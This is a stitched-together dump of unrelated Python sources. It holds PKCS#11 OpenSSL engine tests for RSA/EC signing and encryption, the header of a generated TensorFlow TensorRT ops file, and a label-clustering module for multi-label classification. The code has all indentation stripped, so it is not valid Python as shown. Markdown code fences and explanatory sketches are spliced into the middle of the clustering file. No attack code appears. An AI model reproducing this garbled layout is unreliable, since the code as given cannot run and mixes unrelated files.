pubkey = engine.engine_load_public_key(e, alias)
data = b"\x00" * 8192
p = tmp_path / "test_ec_sign_data"
p.write_bytes(data)
for k in ("sha256", "sha384", "sha512"):
sig = pkey.sign(data, engine.ecdsa_with_hash(k))
p_sig = tmp_path / "test_ec_sign_sig"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
pubkey.verify(sig, data, engine.ecdsa_with_hash(k))
engine.engine_finish(e)
def test_rsa_encrypt(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(128)
p = tmp_path / "test_encrypt_data"
p.write_bytes(data)
padding = engine.engine_padding_pkcs1()
out = pubkey.encrypt(data, padding)
ciphered = tmp_path / "test_encrypt_ciphertext"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plaintext"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = pkey.decrypt(out, padding)
assert data == recover
padding = engine.engine_padding_oaep("sha256", "sha256")
out = pubkey.encrypt(data, padding)
ciphered = tmp_path / "test_encrypt_cipheroaep"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plainoaep"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-pkeyopt",
"rsa_padding_mode:oaep",
"-pkeyopt",
"rsa_mgf1_md:sha256",
"-pkeyopt",
"rsa_oaep_md:sha256",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = pkey.decrypt(out, padding)
assert data == recover
engine.engine_finish(e)
def test_engine_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(1048576)
p = tmp_path / "test_sign_data"
p.write_bytes(data)
for k in ("sha256", "sha384", "sha512"):
sig = engine.engine_sign(
pkey._evp_pkey,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PADDING,),
)
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / f"test_sign_sig-{k}"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
engine.engine_verify(
pubkey._evp_pkey,
sig,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PADDING,),
)
engine.engine_finish(e)
def test_engine_pss_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(1048576)
p = tmp_path / "test_pss_sign_data"
p.write_bytes(data)
for k in ("sha256:64", "sha384:-1", "sha512:-2"):
k, pss_saltlen = k.split(":")
pss_saltlen = int(pss_saltlen)
sig = engine.engine_sign(
pkey._evp_pkey,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PSS_PADDING, pss_saltlen),
)
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / f"test_pss_sign_sig-{k}"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-sigopt",
"rsa_padding_mode:pss",
"-signature",
f"{p_sig}",
f"{p}"
]
)
assert proc.returncode == 0
engine.engine_verify(
pubkey._evp_pkey,
sig,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PSS_PADDING, pss_saltlen),
)
engine.engine_finish(e)
def test_engine_encrypt(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(128)
p = tmp_path / "test_encrypt_data"
p.write_bytes(data)
out = engine.engine_encrypt(pubkey._evp_pkey, data, (1,))
ciphered = tmp_path / "test_encrypt_ciphertext"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plaintext"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = engine.engine_decrypt(
pkey._evp_pkey, out, (engine.RSAPadding.RSA_PKCS1_PADDING,)
)
assert data == recover
out = engine.engine_encrypt(
pubkey._evp_pkey,
data,
padding=(engine.RSAPadding.RSA_PKCS1_OAEP_PADDING, "sha256", "sha256"),
)
ciphered = tmp_path / "test_encrypt_cipheroaep"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plainoaep"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-pkeyopt",
"rsa_padding_mode:oaep",
"-pkeyopt",
"rsa_mgf1_md:sha256",
"-pkeyopt",
"rsa_oaep_md:sha256",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = engine.engine_decrypt(
pkey._evp_pkey,
out,
(engine.RSAPadding.RSA_PKCS1_OAEP_PADDING, "sha256", "sha256"),
)
assert data == recover
engine.engine_finish(e)
# File: venv/lib/python3.6/site-packages/tensorflow_core/compiler/tf2tensorrt/ops/gen_trt_ops.py
# Repo: databill86/HyperFoods (license: MIT)
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: trt_ops.cc
"""
import collections
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
# File: label_clusterer.py
# Repo: kathrynchapman/LA_MC2C (license: CC0-1.0)
import numpy as np
import pickle
from tqdm import tqdm, trange
import math
from collections import defaultdict, Counter, OrderedDict
import operator
import os
import sys
from distance_computer import *
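
Before the clusterer itself, a self-contained sketch of the label co-occurrence computation it relies on (see `compute_C_matrix` below): given a document-by-label indicator matrix `E`, entry `C[i, j]` is 1 iff labels `i` and `j` appear together in at least one document. The function name `_cooccurrence_sketch` and the toy matrix are illustrative only:

```python
import numpy as np

def _cooccurrence_sketch(E):
    # E: (n_docs, n_labels) binary indicator matrix
    n_docs, n_labels = E.shape
    C = np.zeros((n_labels, n_labels))
    for doc in range(n_docs):
        active = np.nonzero(E[doc, :])[0]  # labels present in this document
        for i in active:
            C[i, active] = 1  # mark every label pair seen in the same document
    return C

E = np.array([[1, 1, 0],
              [0, 0, 1]])
C = _cooccurrence_sketch(E)
assert C[0, 1] == 1 and C[1, 0] == 1  # labels 0 and 1 share document 0
assert C[0, 2] == 0                   # labels 0 and 2 never co-occur
```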
def sort_by_values_len(d):
    # renamed parameter from `dict` to `d` to avoid shadowing the builtin
    dict_len = {key: len(value) for key, value in d.items()}
    sorted_key_list = sorted(dict_len.items(), key=operator.itemgetter(1))
    sorted_dict = [(item[0], d[item[0]]) for item in sorted_key_list]
    return sorted_dict
class MC2CLabelClusterer:
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
self.data_dir = data_dir
self.hierarchical_data_dir = 'data/hierarchical_data/'
self.hierarchical_data_dir += 'cantemist/' if 'cantemist' in self.data_dir else ''
self.hierarchical_data_dir += 'es/' if 'spanish' in self.data_dir else ''
self.hierarchical_data_dir += 'de/' if 'german' in self.data_dir else ''
self.data_type = ''
self.load_data('train')
self.load_data('dev')
self.add_none = add_none
self.train_ids = [d[0] for d in self.train_data]
self.dev_ids = [d[0] for d in self.dev_data]
self.max_freq_threshold = max_freq_threshold
self.m = len(self.train_data[0][2]) # num labels
self.n = len(self.train_data) # num docs
self.E = np.zeros((self.n, self.m))
self.C = np.zeros((self.m, self.m))
self.create_E_matrix()
self.power_dict = dict() # per-label clustering power dictionary
self.clusters = defaultdict(set) # dict of {seed: {label1, ..., labeln},...}
self.loners = set() # those labels which get their own single binary classifier
self.doc_id2activated_clusters = defaultdict(set) # dictionary mapping doc_id --> relevant clusters
self.max_cluster_size = max_cluster_size
self.min_cluster_size = min_cluster_size
self.n_c = (self.m // (self.max_cluster_size - 1)) + 1
self.cluster_class_counts = dict()
self.label_class_counts = dict()
self.overall_idx2cluster_idx = defaultdict(dict)
self.cluster_idx2overall_idx = defaultdict(dict)
self.out_dir = os.path.join(self.data_dir,
'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
if not os.path.exists(os.path.join(self.data_dir, 'MCC/')):
os.mkdir(os.path.join(self.data_dir, 'MCC/'))
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except:
self.compute_C_matrix()
self.delta = self.n_c / self.m
self.epsilon = 0.001
def load_data(self, data_type):
        # note: data_type is effectively unused here; both splits are always loaded,
        # so the pointless .format(data_type) calls on the literal filenames were dropped
        self.train_data = pickle.load(open(os.path.join(self.data_dir, 'train_0_False.p'), 'rb'))
        self.dev_data = pickle.load(open(os.path.join(self.data_dir, 'dev_0_False.p'), 'rb'))
def create_E_matrix(self):
try:
for i, (doc_id, text, labels, ranks) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
except:
for i, (doc_id, text, labels) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
def compute_C_matrix(self):
"""
Creates a co-occurrence matrix from self.E
:return:
"""
print("Computing Co-occurrence Matrix for Label Clustering...")
for i in trange(self.m):
for j in range(self.n):
co_occurrences = set(np.nonzero(self.E[j, :])[0])
if i not in co_occurrences:
continue
else:
for l in co_occurrences:
self.C[i, l] = 1
pickle.dump(self.C, open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
        mutual exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
try:
            # dicts have no .deepcopy() method; build a deep-enough copy of the
            # {seed: [labels]} mapping by copying each value list
            temp = {k: list(v) for k, v in self.clusters.items()}
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
# sometimes, this doesn't work though and then certain labels are left without a cluster, thus the
# try/except
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except:
pass
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def compute_label_freqs(self):
label_freq_dict = {i: np.sum(self.E[:, i]) for i in range(self.m)}
return label_freq_dict
def make_cluster_idx2general_idx_dict(self):
"""
Creates a dictionary which maps between the global index of a label and the local (inner-cluster-specific)
index. The seed is what identifies a cluster, and this gives us a way to map between what labels are at
what indices within a cluster
:return:
"""
for seed, cluster in self.clusters.items():
for i, c in enumerate(cluster):
self.overall_idx2cluster_idx[seed][c] = i # {Seed: {mlb label idx: inner-cluster idx,...},...}
self.cluster_idx2overall_idx[seed][i] = c # {Seed: {inner-cluster idx: mlb label idx,...},...}
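# The two nested dictionaries built above are inverse index maps per cluster. A minimal
# standalone sketch with toy clusters (names hypothetical):

```python
clusters = {7: [7, 2, 9], 4: [4, 0]}  # {seed: [global label indices]} (toy)
# global label index -> position within the cluster
overall2cluster = {seed: {g: i for i, g in enumerate(cluster)}
                   for seed, cluster in clusters.items()}
# position within the cluster -> global label index
cluster2overall = {seed: {i: g for i, g in enumerate(cluster)}
                   for seed, cluster in clusters.items()}
```

# The two maps are exact inverses of each other within each cluster.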
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
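# The per-cluster relabeling inside split_data_by_clusters amounts to: intersect a document's
# global positive labels with the cluster's members, then set those positions in a cluster-local
# binary vector. A minimal sketch on toy data (names hypothetical):

```python
import numpy as np

cluster = [7, 2, 9]                        # global label indices in one cluster (toy)
overall2cluster = {g: i for i, g in enumerate(cluster)}
doc_labels = [2, 5, 9]                     # global positives for one document
local = np.zeros(len(cluster))
filtered = set(doc_labels) & set(cluster)  # positives relevant to this cluster
local[[overall2cluster[g] for g in filtered]] = 1
```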
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
with open(os.path.join(self.out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(self.out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(self.out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(self.out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def generate_preliminary_exp_data(self):
PRELIMINARY_EXP_DATA = []
with open(os.path.join(self.out_dir, 'train.p'), 'wb') as pf:
for d in self.train_data:
PRELIMINARY_EXP_DATA.append((d[0], d[1], self.doc_id2activated_clusters[d[0]]))
pickle.dump(PRELIMINARY_EXP_DATA, pf)
def compute_class_counts(self):
# label_class_counts = dict()
# for seed, idx2count_dict in self.label_class_counts.items():
# label_class_counts[seed] = [idx2count_dict[k] for k in sorted(idx2count_dict)]
# print(label_class_counts)
cluster_class_counts = {seed: sum(counts) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now stored in a dictionary keyed by the cluster's index in the
# MLCC step, rather than by its seed
pickle.dump(label_class_counts, open(os.path.join(self.out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(self.out_dir, 'global_cluster_counts.p'), 'wb'))
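# The per-cluster weight (self.n - c) / c computed above is the ratio of negative to positive
# documents for that cluster, i.e. the usual pos_weight for a binary loss. A minimal worked
# example (toy counts):

```python
n = 100                          # total number of training documents (toy)
cluster_counts = [20, 50, 4]     # positive documents per cluster
# negative-to-positive ratio, usable as a pos_weight in a binary loss
ratios = [(n - c) / c for c in cluster_counts]
```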
def generate_activated_clusters_for_dev_data(self):
print(self.clusters)
pass
def main(self):
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
pickle.dump(self.clusters, open(os.path.join(self.out_dir, 'clusters.p'), 'wb'))
else:
self.clusters = pickle.load(open(os.path.join(self.out_dir, 'clusters.p'), 'rb'))
class MC2CLabelClusterer_None(MC2CLabelClusterer):
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=True):
MC2CLabelClusterer.__init__(self, data_dir, max_cluster_size=max_cluster_size,
min_cluster_size=min_cluster_size,
max_freq_threshold=max_freq_threshold, add_none=add_none)
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except Exception:  # cached C matrix missing or unreadable; recompute it
self.compute_C_matrix()
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while
maintaining mutual exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold)  # maximum absolute frequency we'll allow in order for a code
# to make it into a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
non_overlap_dict[self.m] = [f[0] for f in freqs] # None label co-occurs with nothing
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
cluster = cluster + [self.m]
# cluster = [self.m] + cluster
self.clusters[seed] = [seed] + cluster # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
# self.clusters[l] = [self.m, l]
self.clusters[l] = [l, self.m]
try:
temp = {seed: list(cluster) for seed, cluster in self.clusters.items()}  # dict has no .deepcopy(); copy each cluster list
to_remove = set()
# Find the leftover, low-frequency codes which ended up alone in their own cluster and merge them into
# another compatible cluster. This may cause max_cluster_size to be exceeded by 1 or 2, but that is
# preferable to leaving them on their own if we want to employ an LDAM loss function. Sometimes no
# compatible cluster exists and certain labels would be left without one, hence the try/except.
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except Exception:
pass  # merging occasionally leaves a label without a cluster; keep the unmerged clusters
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
mlb.classes_ = np.append(mlb.classes_, np.array(['None']))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2] # e.g. if we have only 10 labels total [0, 1, 0, 0, 0, 1, 1, 0, 0, 0]
labels = np.nonzero(label_matrix)[0].tolist() # [1, 5, 6]
for seed in self.clusters.keys(): # for cluster in clusters
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MCC
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
if not filtered_labels: # if there is no true label in the activated cluster, make it the 'None' label
filtered_labels = {self.m}
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
# we have now mapped the positive labels from the entire label space to those which are positive
# within the specific cluster we're focusing on; here, most of the pos labels will be at the -1
# index, since we made 'None' the last index everywhere (in each cluster, in mlb.classes_...)
label_matrix[new_cluster_specific_label_idx] = 1
if data_type == self.train_data:
assert np.sum(label_matrix) == 1, "There is more than one active label in the cluster."
data_dict[seed].append((doc_id, text, label_matrix))
"""
Okay anything from here down I gotta redo; I need to make sure that when 'None' is the true label in a
cluster, that the cluster activator has a 0 for that cluster.
"""
for seed, data in data_dict.items():
# for cluster, [(doc_id, text, label_matrix_for_that_cluster), (doc_id, text, label_matrix_for_that_cluster)]
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
# print(seed, all_labs_counts)
for entry in data: # iterate over the different (doc_id, text, label_matrix_for_that_cluster)
if entry[-1][-1] != 1: # make sure 'None' isn't the pos label
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2] # {doc_id: label_matrix_for_that_cluster}
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + str(entry[1]) + '\t' + str(lab) + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
with open(os.path.join(self.out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(self.out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
true_pos_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(true_pos_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters)) # make empty vector of length n_clusters
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in true_pos_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in true_pos_clusters]) + '\n')
for doc_id in self.dev_ids:
true_pos_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(true_pos_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
